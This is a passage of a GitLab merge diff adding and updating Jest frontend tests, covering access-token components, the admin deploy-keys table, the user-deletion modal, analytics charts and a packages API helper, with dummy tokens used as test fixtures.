+// https://gitlab.com/gitlab-org/gitlab/-/merge_requests/39496#note_503084332 +setGlobalDateToFakeDate(); + +Vue.config.devtools = false; +Vue.config.productionTip = false; + +Vue.use(Translate); + +// convenience wrapper for migration from Karma +Object.assign(global, { + loadFixtures: loadHTMLFixture, + setFixtures: setHTMLFixture, +}); + +const JQUERY_MATCHERS_TO_EXCLUDE = ['toHaveLength', 'toExist']; + +// custom-jquery-matchers was written for an old Jest version, we need to make it compatible +Object.entries(jqueryMatchers).forEach(([matcherName, matcherFactory]) => { + // Exclude these jQuery matchers + if (JQUERY_MATCHERS_TO_EXCLUDE.includes(matcherName)) { + return; + } + + expect.extend({ + [matcherName]: matcherFactory().compare, + }); +}); + +expect.extend(customMatchers); + +testUtilsConfig.deprecationWarningHandler = (method, message) => { + const ALLOWED_DEPRECATED_METHODS = [ + // https://gitlab.com/gitlab-org/gitlab/-/issues/295679 + 'finding components with `find` or `get`', + + // https://gitlab.com/gitlab-org/gitlab/-/issues/295680 + 'finding components with `findAll`', + ]; + if (!ALLOWED_DEPRECATED_METHODS.includes(method)) { + global.console.error(message); + } +}; + +Object.assign(global, { + requestIdleCallback(cb) { + const start = Date.now(); + return setTimeout(() => { + cb({ + didTimeout: false, + timeRemaining: () => Math.max(0, 50 - (Date.now() - start)), + }); + }); + }, + cancelIdleCallback(id) { + clearTimeout(id); + }, +}); + +beforeEach(() => { + // make sure that each test actually tests something + // see https://jestjs.io/docs/en/expect#expecthasassertions + expect.hasAssertions(); + + // Reset the mocked window.location. This ensures tests don't interfere with + // each other, and removes the need to tidy up if it was changed for a given + // test. 
+ setWindowLocation(TEST_HOST); +}); diff --git a/spec/frontend/access_tokens/components/token_spec.js b/spec/frontend/access_tokens/components/token_spec.js new file mode 100644 index 00000000000..1af21aaa8cd --- /dev/null +++ b/spec/frontend/access_tokens/components/token_spec.js @@ -0,0 +1,65 @@ +import { mountExtended } from 'helpers/vue_test_utils_helper'; + +import Token from '~/access_tokens/components/token.vue'; +import InputCopyToggleVisibility from '~/vue_shared/components/form/input_copy_toggle_visibility.vue'; + +describe('Token', () => { + let wrapper; + + const defaultPropsData = { + token: 'az4a2l5f8ssa0zvdfbhidbzlx', + inputId: 'feed_token', + inputLabel: 'Feed token', + copyButtonTitle: 'Copy feed token', + }; + + const defaultSlots = { + title: 'Feed token title', + description: 'Feed token description', + 'input-description': 'Feed token input description', + }; + + const createComponent = () => { + wrapper = mountExtended(Token, { propsData: defaultPropsData, slots: defaultSlots }); + }; + + afterEach(() => { + wrapper.destroy(); + }); + + it('renders title slot', () => { + createComponent(); + + expect(wrapper.findByText(defaultSlots.title, { selector: 'h4' }).exists()).toBe(true); + }); + + it('renders description slot', () => { + createComponent(); + + expect(wrapper.findByText(defaultSlots.description).exists()).toBe(true); + }); + + it('renders input description slot', () => { + createComponent(); + + expect(wrapper.findByText(defaultSlots['input-description']).exists()).toBe(true); + }); + + it('correctly passes props to `InputCopyToggleVisibility` component', () => { + createComponent(); + + const inputCopyToggleVisibilityComponent = wrapper.findComponent(InputCopyToggleVisibility); + + expect(inputCopyToggleVisibilityComponent.props()).toMatchObject({ + formInputGroupProps: { + id: defaultPropsData.inputId, + }, + value: defaultPropsData.token, + copyButtonTitle: defaultPropsData.copyButtonTitle, + }); + 
expect(inputCopyToggleVisibilityComponent.attributes()).toMatchObject({ + label: defaultPropsData.inputLabel, + 'label-for': defaultPropsData.inputId, + }); + }); +}); diff --git a/spec/frontend/access_tokens/components/tokens_app_spec.js b/spec/frontend/access_tokens/components/tokens_app_spec.js new file mode 100644 index 00000000000..d7acfbb47eb --- /dev/null +++ b/spec/frontend/access_tokens/components/tokens_app_spec.js @@ -0,0 +1,148 @@ +import { merge } from 'lodash'; + +import { mountExtended, extendedWrapper } from 'helpers/vue_test_utils_helper'; + +import TokensApp from '~/access_tokens/components/tokens_app.vue'; +import { FEED_TOKEN, INCOMING_EMAIL_TOKEN, STATIC_OBJECT_TOKEN } from '~/access_tokens/constants'; + +describe('TokensApp', () => { + let wrapper; + + const defaultProvide = { + tokenTypes: { + [FEED_TOKEN]: { + enabled: true, + token: 'DUKu345VD73Py7zz3z89', + resetPath: '/-/profile/reset_feed_token', + }, + [INCOMING_EMAIL_TOKEN]: { + enabled: true, + token: 'az4a2l5f8ssa0zvdfbhidbzlx', + resetPath: '/-/profile/reset_incoming_email_token', + }, + [STATIC_OBJECT_TOKEN]: { + enabled: true, + token: 'QHXwGHYioHTgxQnAcyZ-', + resetPath: '/-/profile/reset_static_object_token', + }, + }, + }; + + const createComponent = (options = {}) => { + wrapper = mountExtended(TokensApp, merge({}, { provide: defaultProvide }, options)); + }; + + const expectTokenRendered = ({ + testId, + expectedLabel, + expectedDescription, + expectedInputDescription, + expectedResetPath, + expectedResetConfirmMessage, + expectedProps, + }) => { + const container = extendedWrapper(wrapper.findByTestId(testId)); + + expect(container.findByText(expectedLabel, { selector: 'h4' }).exists()).toBe(true); + expect(container.findByText(expectedDescription).exists()).toBe(true); + expect(container.findByText(expectedInputDescription, { exact: false }).exists()).toBe(true); + expect(container.findByText('reset this token').attributes()).toMatchObject({ + 'data-confirm': 
expectedResetConfirmMessage, + 'data-method': 'put', + href: expectedResetPath, + }); + expect(container.props()).toMatchObject(expectedProps); + }; + + afterEach(() => { + wrapper.destroy(); + }); + + it('renders all enabled tokens', () => { + createComponent(); + + expectTokenRendered({ + testId: TokensApp.htmlAttributes[FEED_TOKEN].containerTestId, + expectedLabel: TokensApp.i18n[FEED_TOKEN].label, + expectedDescription: TokensApp.i18n[FEED_TOKEN].description, + expectedInputDescription: + 'Keep this token secret. Anyone who has it can read activity and issue RSS feeds or your calendar feed as if they were you.', + expectedResetPath: defaultProvide.tokenTypes[FEED_TOKEN].resetPath, + expectedResetConfirmMessage: TokensApp.i18n[FEED_TOKEN].resetConfirmMessage, + expectedProps: { + token: defaultProvide.tokenTypes[FEED_TOKEN].token, + inputId: TokensApp.htmlAttributes[FEED_TOKEN].inputId, + inputLabel: TokensApp.i18n[FEED_TOKEN].label, + copyButtonTitle: TokensApp.i18n[FEED_TOKEN].copyButtonTitle, + }, + }); + + expectTokenRendered({ + testId: TokensApp.htmlAttributes[INCOMING_EMAIL_TOKEN].containerTestId, + expectedLabel: TokensApp.i18n[INCOMING_EMAIL_TOKEN].label, + expectedDescription: TokensApp.i18n[INCOMING_EMAIL_TOKEN].description, + expectedInputDescription: + 'Keep this token secret. 
Anyone who has it can create issues as if they were you.', + expectedResetPath: defaultProvide.tokenTypes[INCOMING_EMAIL_TOKEN].resetPath, + expectedResetConfirmMessage: TokensApp.i18n[INCOMING_EMAIL_TOKEN].resetConfirmMessage, + expectedProps: { + token: defaultProvide.tokenTypes[INCOMING_EMAIL_TOKEN].token, + inputId: TokensApp.htmlAttributes[INCOMING_EMAIL_TOKEN].inputId, + inputLabel: TokensApp.i18n[INCOMING_EMAIL_TOKEN].label, + copyButtonTitle: TokensApp.i18n[INCOMING_EMAIL_TOKEN].copyButtonTitle, + }, + }); + + expectTokenRendered({ + testId: TokensApp.htmlAttributes[STATIC_OBJECT_TOKEN].containerTestId, + expectedLabel: TokensApp.i18n[STATIC_OBJECT_TOKEN].label, + expectedDescription: TokensApp.i18n[STATIC_OBJECT_TOKEN].description, + expectedInputDescription: + 'Keep this token secret. Anyone who has it can access repository static objects as if they were you.', + expectedResetPath: defaultProvide.tokenTypes[STATIC_OBJECT_TOKEN].resetPath, + expectedResetConfirmMessage: TokensApp.i18n[STATIC_OBJECT_TOKEN].resetConfirmMessage, + expectedProps: { + token: defaultProvide.tokenTypes[STATIC_OBJECT_TOKEN].token, + inputId: TokensApp.htmlAttributes[STATIC_OBJECT_TOKEN].inputId, + inputLabel: TokensApp.i18n[STATIC_OBJECT_TOKEN].label, + copyButtonTitle: TokensApp.i18n[STATIC_OBJECT_TOKEN].copyButtonTitle, + }, + }); + }); + + it("doesn't render disabled tokens", () => { + createComponent({ + provide: { + tokenTypes: { + [FEED_TOKEN]: { + enabled: false, + }, + }, + }, + }); + + expect( + wrapper.findByTestId(TokensApp.htmlAttributes[FEED_TOKEN].containerTestId).exists(), + ).toBe(false); + }); + + describe('when there are tokens missing an `i18n` definition', () => { + it('renders without errors', () => { + createComponent({ + provide: { + tokenTypes: { + fooBar: { + enabled: true, + token: 'rewjoa58dfm54jfkdlsdf', + resetPath: '/-/profile/foo_bar', + }, + }, + }, + }); + + expect( + 
wrapper.findByTestId(TokensApp.htmlAttributes[FEED_TOKEN].containerTestId).exists(), + ).toBe(true); + }); + }); +}); diff --git a/spec/frontend/admin/analytics/devops_score/components/devops_score_spec.js b/spec/frontend/admin/analytics/devops_score/components/devops_score_spec.js index 824eb033671..14f94e671a4 100644 --- a/spec/frontend/admin/analytics/devops_score/components/devops_score_spec.js +++ b/spec/frontend/admin/analytics/devops_score/components/devops_score_spec.js @@ -1,4 +1,4 @@ -import { GlTable, GlBadge, GlEmptyState } from '@gitlab/ui'; +import { GlTableLite, GlBadge, GlEmptyState } from '@gitlab/ui'; import { GlSingleStat } from '@gitlab/ui/dist/charts'; import { mount } from '@vue/test-utils'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; @@ -20,7 +20,7 @@ describe('DevopsScore', () => { ); }; - const findTable = () => wrapper.findComponent(GlTable); + const findTable = () => wrapper.findComponent(GlTableLite); const findEmptyState = () => wrapper.findComponent(GlEmptyState); const findCol = (testId) => findTable().find(`[data-testid="${testId}"]`); const findUsageCol = () => findCol('usageCol'); @@ -44,7 +44,7 @@ describe('DevopsScore', () => { }); it('displays the correct message', () => { - expect(findEmptyState().text()).toBe( + expect(findEmptyState().text().replace(/\s+/g, ' ')).toBe( 'Data is still calculating... It may be several days before you see feature usage data. 
See example DevOps Score page in our documentation.', ); }); @@ -124,11 +124,11 @@ describe('DevopsScore', () => { describe('table columns', () => { describe('Your usage', () => { - it('displays the corrrect value', () => { + it('displays the correct value', () => { expect(findUsageCol().text()).toContain('3.2'); }); - it('displays the corrrect badge', () => { + it('displays the correct badge', () => { const badge = findUsageCol().find(GlBadge); expect(badge.exists()).toBe(true); diff --git a/spec/frontend/admin/deploy_keys/components/table_spec.js b/spec/frontend/admin/deploy_keys/components/table_spec.js index 3b3be488043..49bda7100fb 100644 --- a/spec/frontend/admin/deploy_keys/components/table_spec.js +++ b/spec/frontend/admin/deploy_keys/components/table_spec.js @@ -1,8 +1,19 @@ import { merge } from 'lodash'; -import { GlTable, GlButton } from '@gitlab/ui'; +import { GlLoadingIcon, GlEmptyState, GlPagination, GlModal } from '@gitlab/ui'; +import { nextTick } from 'vue'; +import responseBody from 'test_fixtures/api/deploy_keys/index.json'; import { mountExtended } from 'helpers/vue_test_utils_helper'; +import waitForPromises from 'helpers/wait_for_promises'; +import { stubComponent } from 'helpers/stub_component'; import DeployKeysTable from '~/admin/deploy_keys/components/table.vue'; +import TimeAgoTooltip from '~/vue_shared/components/time_ago_tooltip.vue'; +import Api, { DEFAULT_PER_PAGE } from '~/api'; +import createFlash from '~/flash'; + +jest.mock('~/api'); +jest.mock('~/flash'); +jest.mock('~/lib/utils/csrf', () => ({ token: 'mock-csrf-token' })); describe('DeployKeysTable', () => { let wrapper; @@ -14,9 +25,60 @@ describe('DeployKeysTable', () => { emptyStateSvgPath: '/assets/illustrations/empty-state/empty-deploy-keys.svg', }; + const deployKey = responseBody[0]; + const deployKey2 = responseBody[1]; + const createComponent = (provide = {}) => { wrapper = mountExtended(DeployKeysTable, { provide: merge({}, defaultProvide, provide), + stubs: { + 
GlModal: stubComponent(GlModal, { + template: ` + <div> + <slot name="modal-title"></slot> + <slot></slot> + <slot name="modal-footer"></slot> + </div>`, + }), + }, + }); + }; + + const findEditButton = (index) => + wrapper.findAllByLabelText(DeployKeysTable.i18n.edit, { selector: 'a' }).at(index); + const findRemoveButton = (index) => + wrapper.findAllByLabelText(DeployKeysTable.i18n.delete, { selector: 'button' }).at(index); + const findLoadingIcon = () => wrapper.findComponent(GlLoadingIcon); + const findTimeAgoTooltip = (index) => wrapper.findAllComponents(TimeAgoTooltip).at(index); + const findPagination = () => wrapper.findComponent(GlPagination); + + const expectDeployKeyIsRendered = (expectedDeployKey, expectedRowIndex) => { + const editButton = findEditButton(expectedRowIndex); + const timeAgoTooltip = findTimeAgoTooltip(expectedRowIndex); + + expect(wrapper.findByText(expectedDeployKey.title).exists()).toBe(true); + expect(wrapper.findByText(expectedDeployKey.fingerprint, { selector: 'code' }).exists()).toBe( + true, + ); + expect(timeAgoTooltip.exists()).toBe(true); + expect(timeAgoTooltip.props('time')).toBe(expectedDeployKey.created_at); + expect(editButton.exists()).toBe(true); + expect(editButton.attributes('href')).toBe(`/admin/deploy_keys/${expectedDeployKey.id}/edit`); + expect(findRemoveButton(expectedRowIndex).exists()).toBe(true); + }; + + const itRendersTheEmptyState = () => { + it('renders empty state', () => { + const emptyState = wrapper.findComponent(GlEmptyState); + + expect(emptyState.exists()).toBe(true); + expect(emptyState.props()).toMatchObject({ + svgPath: defaultProvide.emptyStateSvgPath, + title: DeployKeysTable.i18n.emptyStateTitle, + description: DeployKeysTable.i18n.emptyStateDescription, + primaryButtonText: DeployKeysTable.i18n.newDeployKeyButtonText, + primaryButtonLink: defaultProvide.createPath, + }); }); }; @@ -30,18 +92,149 @@ describe('DeployKeysTable', () => { 
expect(wrapper.findByText(DeployKeysTable.i18n.pageTitle).exists()).toBe(true); }); - it('renders table', () => { + it('renders `New deploy key` button', () => { createComponent(); - expect(wrapper.findComponent(GlTable).exists()).toBe(true); + const newDeployKeyButton = wrapper.findByTestId('new-deploy-key-button'); + + expect(newDeployKeyButton.exists()).toBe(true); + expect(newDeployKeyButton.attributes('href')).toBe(defaultProvide.createPath); + }); + + describe('when `/deploy_keys` API request is pending', () => { + beforeEach(() => { + Api.deployKeys.mockImplementation(() => new Promise(() => {})); + }); + + it('shows loading icon', async () => { + createComponent(); + + await nextTick(); + + expect(findLoadingIcon().exists()).toBe(true); + }); }); - it('renders `New deploy key` button', () => { - createComponent(); + describe('when `/deploy_keys` API request is successful', () => { + describe('when there are deploy keys', () => { + beforeEach(() => { + Api.deployKeys.mockResolvedValue({ + data: responseBody, + headers: { 'x-total': `${responseBody.length}` }, + }); - const newDeployKeyButton = wrapper.findComponent(GlButton); + createComponent(); + }); - expect(newDeployKeyButton.text()).toBe(DeployKeysTable.i18n.newDeployKeyButtonText); - expect(newDeployKeyButton.attributes('href')).toBe(defaultProvide.createPath); + it('renders deploy keys in table', () => { + expectDeployKeyIsRendered(deployKey, 0); + expectDeployKeyIsRendered(deployKey2, 1); + }); + + describe('when delete button is clicked', () => { + it('asks user to confirm', async () => { + await findRemoveButton(0).trigger('click'); + + const modal = wrapper.findComponent(GlModal); + const form = modal.find('form'); + const submitSpy = jest.spyOn(form.element, 'submit'); + + expect(modal.props('visible')).toBe(true); + expect(form.attributes('action')).toBe(`/admin/deploy_keys/${deployKey.id}`); + expect(form.find('input[name="_method"]').attributes('value')).toBe('delete'); + 
expect(form.find('input[name="authenticity_token"]').attributes('value')).toBe( + 'mock-csrf-token', + ); + + modal.vm.$emit('primary'); + + expect(submitSpy).toHaveBeenCalled(); + }); + }); + }); + + describe('pagination', () => { + beforeEach(() => { + Api.deployKeys.mockResolvedValueOnce({ + data: [deployKey], + headers: { 'x-total': '2' }, + }); + + createComponent(); + }); + + it('renders pagination', () => { + const pagination = findPagination(); + expect(pagination.exists()).toBe(true); + expect(pagination.props()).toMatchObject({ + value: 1, + perPage: DEFAULT_PER_PAGE, + totalItems: responseBody.length, + nextText: DeployKeysTable.i18n.pagination.next, + prevText: DeployKeysTable.i18n.pagination.prev, + align: 'center', + }); + }); + + describe('when pagination is changed', () => { + it('calls API with `page` parameter', async () => { + const pagination = findPagination(); + expectDeployKeyIsRendered(deployKey, 0); + + Api.deployKeys.mockResolvedValue({ + data: [deployKey2], + headers: { 'x-total': '2' }, + }); + + pagination.vm.$emit('input', 2); + + await nextTick(); + + expect(findLoadingIcon().exists()).toBe(true); + expect(pagination.exists()).toBe(false); + + await waitForPromises(); + + expect(Api.deployKeys).toHaveBeenCalledWith({ + page: 2, + public: true, + }); + expectDeployKeyIsRendered(deployKey2, 0); + }); + }); + }); + + describe('when there are no deploy keys', () => { + beforeEach(() => { + Api.deployKeys.mockResolvedValue({ + data: [], + headers: { 'x-total': '0' }, + }); + + createComponent(); + }); + + itRendersTheEmptyState(); + }); + }); + + describe('when `deploy_keys` API request is unsuccessful', () => { + const error = new Error('Network Error'); + + beforeEach(() => { + Api.deployKeys.mockRejectedValue(error); + + createComponent(); + }); + + itRendersTheEmptyState(); + + it('displays flash', () => { + expect(createFlash).toHaveBeenCalledWith({ + message: DeployKeysTable.i18n.apiErrorMessage, + captureError: true, + error, + }); 
+ }); }); }); diff --git a/spec/frontend/admin/statistics_panel/components/app_spec.js b/spec/frontend/admin/statistics_panel/components/app_spec.js index 9c424491d04..3cfb6feeb86 100644 --- a/spec/frontend/admin/statistics_panel/components/app_spec.js +++ b/spec/frontend/admin/statistics_panel/components/app_spec.js @@ -1,6 +1,7 @@ import { GlLoadingIcon } from '@gitlab/ui'; -import { createLocalVue, shallowMount } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; import AxiosMockAdapter from 'axios-mock-adapter'; +import Vue from 'vue'; import Vuex from 'vuex'; import StatisticsPanelApp from '~/admin/statistics_panel/components/app.vue'; import statisticsLabels from '~/admin/statistics_panel/constants'; @@ -9,8 +10,7 @@ import axios from '~/lib/utils/axios_utils'; import { convertObjectPropsToCamelCase } from '~/lib/utils/common_utils'; import mockStatistics from '../mock_data'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); describe('Admin statistics app', () => { let wrapper; @@ -19,7 +19,6 @@ describe('Admin statistics app', () => { const createComponent = () => { wrapper = shallowMount(StatisticsPanelApp, { - localVue, store, }); }; diff --git a/spec/frontend/admin/users/components/actions/actions_spec.js b/spec/frontend/admin/users/components/actions/actions_spec.js index 67dcf5c6149..fa485e73999 100644 --- a/spec/frontend/admin/users/components/actions/actions_spec.js +++ b/spec/frontend/admin/users/components/actions/actions_spec.js @@ -1,7 +1,7 @@ import { GlDropdownItem } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; -import { kebabCase } from 'lodash'; import { nextTick } from 'vue'; +import { kebabCase } from 'lodash'; import Actions from '~/admin/users/components/actions'; import SharedDeleteAction from '~/admin/users/components/actions/shared/shared_delete_action.vue'; import { capitalizeFirstCharacter } from '~/lib/utils/text_utility'; @@ -39,9 +39,6 @@ describe('Action 
components', () => { }); await nextTick(); - - expect(wrapper.attributes('data-path')).toBe('/test'); - expect(wrapper.attributes('data-modal-attributes')).toContain('John Doe'); expect(findDropdownItem().exists()).toBe(true); }); }); @@ -66,7 +63,6 @@ describe('Action components', () => { }); await nextTick(); - const sharedAction = wrapper.find(SharedDeleteAction); expect(sharedAction.attributes('data-block-user-url')).toBe(paths.block); @@ -76,6 +72,7 @@ describe('Action components', () => { expect(sharedAction.attributes('data-user-deletion-obstacles')).toBe( JSON.stringify(userDeletionObstacles), ); + expect(findDropdownItem().exists()).toBe(true); }, ); diff --git a/spec/frontend/admin/users/components/modals/__snapshots__/delete_user_modal_spec.js.snap b/spec/frontend/admin/users/components/modals/__snapshots__/delete_user_modal_spec.js.snap index 472158a9b10..7a17ef2cc6c 100644 --- a/spec/frontend/admin/users/components/modals/__snapshots__/delete_user_modal_spec.js.snap +++ b/spec/frontend/admin/users/components/modals/__snapshots__/delete_user_modal_spec.js.snap @@ -78,3 +78,83 @@ exports[`User Operation confirmation modal renders modal with form included 1`] </gl-button-stub> </div> `; + +exports[`User Operation confirmation modal when user's name has leading and trailing whitespace displays user's name without whitespace 1`] = ` +<div> + <p> + content + </p> + + <user-deletion-obstacles-list-stub + obstacles="schedule1,policy1" + username="John Smith" + /> + + <p> + To confirm, type + <code + class="gl-white-space-pre-wrap" + > + John Smith + </code> + </p> + + <form + action="delete-url" + method="post" + > + <input + name="_method" + type="hidden" + value="delete" + /> + + <input + name="authenticity_token" + type="hidden" + value="csrf" + /> + + <gl-form-input-stub + autocomplete="off" + autofocus="" + name="username" + type="text" + value="" + /> + </form> + <gl-button-stub + buttontextclasses="" + category="primary" + icon="" + size="medium" + 
variant="default" + > + Cancel + </gl-button-stub> + + <gl-button-stub + buttontextclasses="" + category="secondary" + disabled="true" + icon="" + size="medium" + variant="danger" + > + + secondaryAction + + </gl-button-stub> + + <gl-button-stub + buttontextclasses="" + category="primary" + disabled="true" + icon="" + size="medium" + variant="danger" + > + action + </gl-button-stub> +</div> +`; diff --git a/spec/frontend/admin/users/components/modals/delete_user_modal_spec.js b/spec/frontend/admin/users/components/modals/delete_user_modal_spec.js index 82307c9e3b3..025ae825e0d 100644 --- a/spec/frontend/admin/users/components/modals/delete_user_modal_spec.js +++ b/spec/frontend/admin/users/components/modals/delete_user_modal_spec.js @@ -1,4 +1,4 @@ -import { GlButton, GlFormInput } from '@gitlab/ui'; +import { GlButton, GlFormInput, GlSprintf } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import DeleteUserModal from '~/admin/users/components/modals/delete_user_modal.vue'; import UserDeletionObstaclesList from '~/vue_shared/components/user_deletion_obstacles/user_deletion_obstacles_list.vue'; @@ -35,7 +35,7 @@ describe('User Operation confirmation modal', () => { const badUsername = 'bad_username'; const userDeletionObstacles = '["schedule1", "policy1"]'; - const createComponent = (props = {}) => { + const createComponent = (props = {}, stubs = {}) => { wrapper = shallowMount(DeleteUserModal, { propsData: { username, @@ -51,6 +51,7 @@ describe('User Operation confirmation modal', () => { }, stubs: { GlModal: ModalStub, + ...stubs, }, }); }; @@ -150,6 +151,30 @@ describe('User Operation confirmation modal', () => { }); }); + describe("when user's name has leading and trailing whitespace", () => { + beforeEach(() => { + createComponent( + { + username: ' John Smith ', + }, + { GlSprintf }, + ); + }); + + it("displays user's name without whitespace", () => { + expect(wrapper.element).toMatchSnapshot(); + }); + + it("shows enabled buttons when 
user's name is entered without whitespace", async () => { + setUsername('John Smith'); + + await wrapper.vm.$nextTick(); + + expect(findPrimaryButton().attributes('disabled')).toBeUndefined(); + expect(findSecondaryButton().attributes('disabled')).toBeUndefined(); + }); + }); + describe('Related user-deletion-obstacles list', () => { it('does NOT render the list when user has no related obstacles', () => { createComponent({ userDeletionObstacles: '[]' }); diff --git a/spec/frontend/admin/users/components/users_table_spec.js b/spec/frontend/admin/users/components/users_table_spec.js index 708c9e1979e..9ff5961c7ec 100644 --- a/spec/frontend/admin/users/components/users_table_spec.js +++ b/spec/frontend/admin/users/components/users_table_spec.js @@ -1,5 +1,5 @@ import { GlTable, GlSkeletonLoader } from '@gitlab/ui'; -import { createLocalVue } from '@vue/test-utils'; +import Vue from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; @@ -16,8 +16,7 @@ import { users, paths, createGroupCountResponse } from '../mock_data'; jest.mock('~/flash'); -const localVue = createLocalVue(); -localVue.use(VueApollo); +Vue.use(VueApollo); describe('AdminUsersTable component', () => { let wrapper; @@ -48,7 +47,6 @@ describe('AdminUsersTable component', () => { const initComponent = (props = {}, resolverMock = fetchGroupCountsResponse) => { wrapper = mountExtended(AdminUsersTable, { - localVue, apolloProvider: createMockApolloProvider(resolverMock), propsData: { users, diff --git a/spec/frontend/alerts_settings/components/__snapshots__/alerts_form_spec.js.snap b/spec/frontend/alerts_settings/components/__snapshots__/alerts_form_spec.js.snap index f4d3fd97fd8..ec5b6a5597b 100644 --- a/spec/frontend/alerts_settings/components/__snapshots__/alerts_form_spec.js.snap +++ b/spec/frontend/alerts_settings/components/__snapshots__/alerts_form_spec.js.snap @@ -12,6 +12,7 @@ exports[`Alert integration settings form default state should match the 
default <gl-form-group-stub class="gl-pl-0" labeldescription="" + optionaltext="(optional)" > <gl-form-checkbox-stub checked="true" @@ -28,6 +29,7 @@ exports[`Alert integration settings form default state should match the default label-for="alert-integration-settings-issue-template" label-size="sm" labeldescription="" + optionaltext="(optional)" > <label class="gl-display-inline-flex" @@ -83,6 +85,7 @@ exports[`Alert integration settings form default state should match the default <gl-form-group-stub class="gl-pl-0 gl-mb-5" labeldescription="" + optionaltext="(optional)" > <gl-form-checkbox-stub> <span> @@ -94,6 +97,7 @@ exports[`Alert integration settings form default state should match the default <gl-form-group-stub class="gl-pl-0 gl-mb-5" labeldescription="" + optionaltext="(optional)" > <gl-form-checkbox-stub checked="true" diff --git a/spec/frontend/alerts_settings/components/mocks/apollo_mock.js b/spec/frontend/alerts_settings/components/mocks/apollo_mock.js index 828580a436b..e7ad2cd1d2a 100644 --- a/spec/frontend/alerts_settings/components/mocks/apollo_mock.js +++ b/spec/frontend/alerts_settings/components/mocks/apollo_mock.js @@ -34,6 +34,7 @@ export const updatePrometheusVariables = { export const getIntegrationsQueryResponse = { data: { project: { + id: '1', alertManagementIntegrations: { nodes: [ { diff --git a/spec/frontend/analytics/usage_trends/components/usage_trends_count_chart_spec.js b/spec/frontend/analytics/usage_trends/components/usage_trends_count_chart_spec.js index 7c2df3fe8c4..1a331100bb8 100644 --- a/spec/frontend/analytics/usage_trends/components/usage_trends_count_chart_spec.js +++ b/spec/frontend/analytics/usage_trends/components/usage_trends_count_chart_spec.js @@ -1,6 +1,7 @@ import { GlAlert } from '@gitlab/ui'; import { GlLineChart } from '@gitlab/ui/dist/charts'; -import { createLocalVue, shallowMount } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import VueApollo from 
'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import UsageTrendsCountChart from '~/analytics/usage_trends/components/usage_trends_count_chart.vue'; @@ -9,8 +10,7 @@ import ChartSkeletonLoader from '~/vue_shared/components/resizable_chart/skeleto import { mockQueryResponse, mockApolloResponse } from '../apollo_mock_data'; import { mockCountsData1 } from '../mock_data'; -const localVue = createLocalVue(); -localVue.use(VueApollo); +Vue.use(VueApollo); const loadChartErrorMessage = 'My load error message'; const noDataMessage = 'My no data message'; @@ -39,7 +39,6 @@ describe('UsageTrendsCountChart', () => { const createComponent = ({ responseHandler }) => { return shallowMount(UsageTrendsCountChart, { - localVue, apolloProvider: createMockApollo([[statsQuery, responseHandler]]), propsData: { ...mockChartConfig }, }); diff --git a/spec/frontend/analytics/usage_trends/components/users_chart_spec.js b/spec/frontend/analytics/usage_trends/components/users_chart_spec.js index 6adfcca11ac..04ea25a02d5 100644 --- a/spec/frontend/analytics/usage_trends/components/users_chart_spec.js +++ b/spec/frontend/analytics/usage_trends/components/users_chart_spec.js @@ -1,6 +1,7 @@ import { GlAlert } from '@gitlab/ui'; import { GlAreaChart } from '@gitlab/ui/dist/charts'; -import { createLocalVue, shallowMount } from '@vue/test-utils'; +import { shallowMount } from '@vue/test-utils'; +import Vue from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import UsersChart from '~/analytics/usage_trends/components/users_chart.vue'; @@ -13,8 +14,7 @@ import { roundedSortedCountsMonthlyChartData2, } from '../mock_data'; -const localVue = createLocalVue(); -localVue.use(VueApollo); +Vue.use(VueApollo); describe('UsersChart', () => { let wrapper; @@ -34,7 +34,6 @@ describe('UsersChart', () => { endDate: new Date(2020, 10, 1), totalDataPoints: mockCountsData2.length, }, - localVue, apolloProvider: 
createMockApollo([[usersQuery, queryHandler]]), data() { return { loadingError }; diff --git a/spec/frontend/api/packages_api_spec.js b/spec/frontend/api/packages_api_spec.js new file mode 100644 index 00000000000..3286dccb1b2 --- /dev/null +++ b/spec/frontend/api/packages_api_spec.js @@ -0,0 +1,53 @@ +import MockAdapter from 'axios-mock-adapter'; +import { publishPackage } from '~/api/packages_api'; +import axios from '~/lib/utils/axios_utils'; +import httpStatus from '~/lib/utils/http_status'; + +describe('Api', () => { + const dummyApiVersion = 'v3000'; + const dummyUrlRoot = '/gitlab'; + const dummyGon = { + api_version: dummyApiVersion, + relative_url_root: dummyUrlRoot, + }; + let originalGon; + let mock; + + beforeEach(() => { + mock = new MockAdapter(axios); + originalGon = window.gon; + window.gon = { ...dummyGon }; + }); + + afterEach(() => { + mock.restore(); + window.gon = originalGon; + }); + + describe('packages', () => { + const projectPath = 'project_a'; + const name = 'foo'; + const packageVersion = '0'; + const apiResponse = [{ id: 1, name: 'foo' }]; + + describe('publishPackage', () => { + it('publishes the package', () => { + const expectedUrl = `${dummyUrlRoot}/api/${dummyApiVersion}/projects/${projectPath}/packages/generic/${name}/${packageVersion}/${name}`; + + jest.spyOn(axios, 'put'); + mock.onPut(expectedUrl).replyOnce(httpStatus.OK, apiResponse); + + return publishPackage( + { projectPath, name, version: 0, fileName: name, files: [{}] }, + { status: 'hidden', select: 'package_file' }, + ).then(({ data }) => { + expect(data).toEqual(apiResponse); + expect(axios.put).toHaveBeenCalledWith(expectedUrl, expect.any(FormData), { + headers: { 'Content-Type': 'multipart/form-data' }, + params: { select: 'package_file', status: 'hidden' }, + }); + }); + }); + }); + }); +}); diff --git a/spec/frontend/api_spec.js b/spec/frontend/api_spec.js index c3e5a2973d7..75faf6d66fa 100644 --- a/spec/frontend/api_spec.js +++ b/spec/frontend/api_spec.js @@ -1,5 
